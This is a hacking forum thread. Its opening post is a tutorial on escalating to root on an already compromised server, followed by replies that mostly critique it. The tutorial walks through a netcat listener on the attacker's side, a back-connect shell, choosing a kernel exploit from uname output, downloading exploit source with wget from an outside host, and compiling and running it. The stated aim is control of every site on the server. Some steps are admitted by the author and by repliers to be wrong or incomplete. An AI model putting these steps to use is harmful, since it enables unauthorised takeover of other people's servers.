[Nefarious]

After actually reading my tutorial again, it's very shitty. You should find a better one until I can make a good one.

Note this thread looks very ugly, sorry.

Hey guys, today I'll be teaching you how to root a server using a local root exploit.

What is rooting?

Rooting is gaining access to the servers root(admin) account. If done correctly you will have access to every site on the compromised server.

Back connecting.

What you will need.
Netcat
Local Root Exploit.
(The script provided is called Enlightenment, it should work on kernels older than may 14th.)
Back Connect Shell

So once we are in the server you will need to start up netcat.

We will do this using command prompt.

Go to the directory netcat is in.
Then do:

Code:

nc.exe

Now you should see this.


Now we want to have netcat listen on our port.
To do that we will use this command.

Code:

-lvp (open port)

You should now see the following.

Now we want to go to our shell and back connect.

If it worked you should see the connection in CMD.

Now type uname -a into CMD and hit enter.

You can google parts of the uname to find the right exploit.

You can check exploit-DB or 1337day.

Compiling and running the exploit

Now you need to upload the exploit, you can do this using your shell or wget.

Code:

wget http://nignog.com/tutorial/sinister.c

Once the exploit is uploaded we need to chmod it to 777.

Code:

chmod 777 sinister.c

Now we want to compile and run the exploit.

Code:

gcc -o sinister sinister.c

To run the exploit.

Code:

./sinister

Now if it all worked out you should be root. Type "whoami" and it should say root.

[Asuna]

A lot of people won't know how to get into the server to begin with, but this is still a nice tutorial.

[Complibur]

Inb4dymecorrectsyousomehow

[Dismas]

I think what you're talking about is vulnerable kernels. In that case, it generally depends on the version (sometimes they backport privilege-escalation vulnerabilities). There are plenty of scripts out there, but you didn't really provide one.

[w00t]

Is there some reason you think you need all users to be able to read, write, and execute your downloaded source? By default, wget makes it readable for you, so you don't need to chmod it.

[Dyme]

This should be called "How to use netcat and gcc".

[Reiko]

There's a few things wrong with this and I'm going to try to criticize constructively so you can improve.
One: there's several versions of Netcat, and they behave a bit differently. If -vlp doesn't work, try just -vl.
Two: Some systems don't actually have wget or a compiler. What do we do in that situation?
(I'll leave the answer up to the reader. Kirito, if you need help with this PM me. Anyone else, go away and stop being a skad.)
Three: as mentioned above, chmod 777 is unnecessary.
Four: You're making assumptions about the reader's choice of operating system. Genericize your tutorial.
Five: This actually isn't going to work exactly like this with Enlightenment. You'd want to extract the .tar.gz provided and run one of the .sh scripts contained therein, which compile and run the 'sploits for you.

[Cressi]

Not 100% percent, but still a fantastic tutorial ^^

[Charon]

Not 100% percent, but still a fantastic tutorial ^^

Please elaborate; why is this tutorial not '100%.' all I see is you spam-posting.

[Nefarious]

There's a few things wrong with this and I'm going to try to criticize constructively so you can improve.
One: there's several versions of Netcat, and they behave a bit differently. If -vlp doesn't work, try just -vl.
Two: Some systems don't actually have wget or a compiler. What do we do in that situation?
(I'll leave the answer up to the reader. Kirito, if you need help with this PM me. Anyone else, go away and stop being a skad.)
Three: as mentioned above, chmod 777 is unnecessary.
Four: You're making assumptions about the reader's choice of operating system. Genericize your tutorial.
Five: This actually isn't going to work exactly like this with Enlightenment. You'd want to extract the .tar.gz provided and run one of the .sh scripts contained therein, which compile and run the 'sploits for you.

One: I was not aware of that at all, my apologies.
Two: Other than curl and wget I wouldn't know what to do, I've sent you a PM.
Four: Once I have familiarize myself with linux I'll add the correct commands.